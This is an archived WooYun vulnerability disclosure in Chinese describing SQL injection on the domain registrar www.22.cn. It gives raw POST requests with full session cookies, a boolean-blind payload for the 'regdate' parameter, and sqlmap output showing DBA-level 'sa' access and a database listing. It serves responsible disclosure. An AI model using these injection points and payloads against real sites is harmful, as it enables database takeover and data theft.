乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-06-30: 细节已通知厂商并且等待厂商处理中 2015-07-03: 厂商已经确认,细节仅向厂商公开 2015-07-13: 细节向核心白帽子及相关领域专家公开 2015-07-23: 细节向普通白帽子公开 2015-08-02: 细节向实习白帽子公开 2015-08-17: 细节向公众公开
233
1,POST /ajax/yuming/guoqi.ashx?t=0.5308634389657527 HTTP/1.1Content-Length: 181Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: www.22.cnCookie: CNZZDATA906087=cnzz_eid%3D1907332321-1435471336-%26ntime%3D1435471336; pic0=images/kefu/dongdong.png; pic1=images/kefu/shuangshuang.png; pic2=images/kefu/wangyan.png; pic3=images/kefu/suxiao.png; ASP.NET_SessionId=bewks2551bomxt2hl1a44y45; aimingsso=930b4b577b6049789399a1a9a647510b; spm=nav_wp,newmember; jingjiatuijian=388758|Labs.com|90552|2##?2###|--@388346|newsfeed.com|25146|1##?2###|--@388768|iLLustrated.com|19152|2##?2###|--@388353|keyo.com|18546|1##?2###|--@388351|personfinder.com|15738|1##?2###|--@388784|greenbacks.com|13146|2##?3###|--@388339|LaLaLand.com|13146|1##?1###|--@388771|shadows.com|13146|2##?2###|--@388283|oomi.com|9972|11##?4###|--@388779|propertyprices.com|9546|2##?3###|--@; weiyueyuming=62|czh.com.cn@61|######.cn@60|##?cn@54|cybank.cn@52|kin.com.cn@; shopcart=Host: www.22.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*fan&action=&deldate=2015-06-22&keyword=e&orderby=&pageCount=50&pageIndex=1&position=4®date=2006&rtype=cn&seo=&suffix=.net,.com.cn,.net.cn,all,2,POST /ajax/YuDing/liebiao.ashx?t=0.7928370023146272&type=cn HTTP/1.1Content-Length: 166Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: www.22.cnCookie: CNZZDATA906087=cnzz_eid%3D1907332321-1435471336-%26ntime%3D1435471336; pic0=images/kefu/dongdong.png; pic1=images/kefu/shuangshuang.png; pic2=images/kefu/wangyan.png; pic3=images/kefu/suxiao.png; ASP.NET_SessionId=bewks2551bomxt2hl1a44y45; aimingsso=930b4b577b6049789399a1a9a647510b; spm=nav_wp,newmember; jingjiatuijian=388758|Labs.com|90552|2##?2###|--@388346|newsfeed.com|25146|1##?2###|--@388768|iLLustrated.com|19152|2##?2###|--@388353|keyo.com|18546|1##?2###|--@388351|personfinder.com|15738|1##?2###|--@388784|greenbacks.com|13146|2##?3###|--@388339|LaLaLand.com|13146|1##?1###|--@388771|shadows.com|13146|2##?2###|--@388283|oomi.com|9972|11##?4###|--@388779|propertyprices.com|9546|2##?3###|--@; weiyueyuming=62|czh.com.cn@61|######.cn@60|##?cn@54|cybank.cn@52|kin.com.cn@; shopcart=Host: www.22.cnConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36Accept: */*fan&action=&day=1&digit=,1,2,3&doublep=0&orderby=&pageCount=50&pageIndex=1&position=1&show=1&strlen=0,9&suffix=,.cn,.com.cn&type=1
---Parameter: regdate (POST) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: fan&action=&deldate=2015-06-22&keyword=e&orderby=&pageCount=50&pageIndex=1&position=4®date=2006 AND 2193=2193&rtype=cn&seo=&suffix=.net,.com.cn,.net.cn,all,---web server operating system: Windows 2008 R2 or 7web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2012current user: 'sa'current user is DBA: Trueavailable databases [12]:[*] a*[*] de***db[*] e***ian[*] e***an[*] e***me[*] e***ebak[*] e***ot[*] e***is[*] master[*] model[*] msdb[*] tempdb
~~
危害等级:高
漏洞Rank:20
确认时间:2015-07-03 22:29
非常感谢反馈!请继续监督我们!
暂无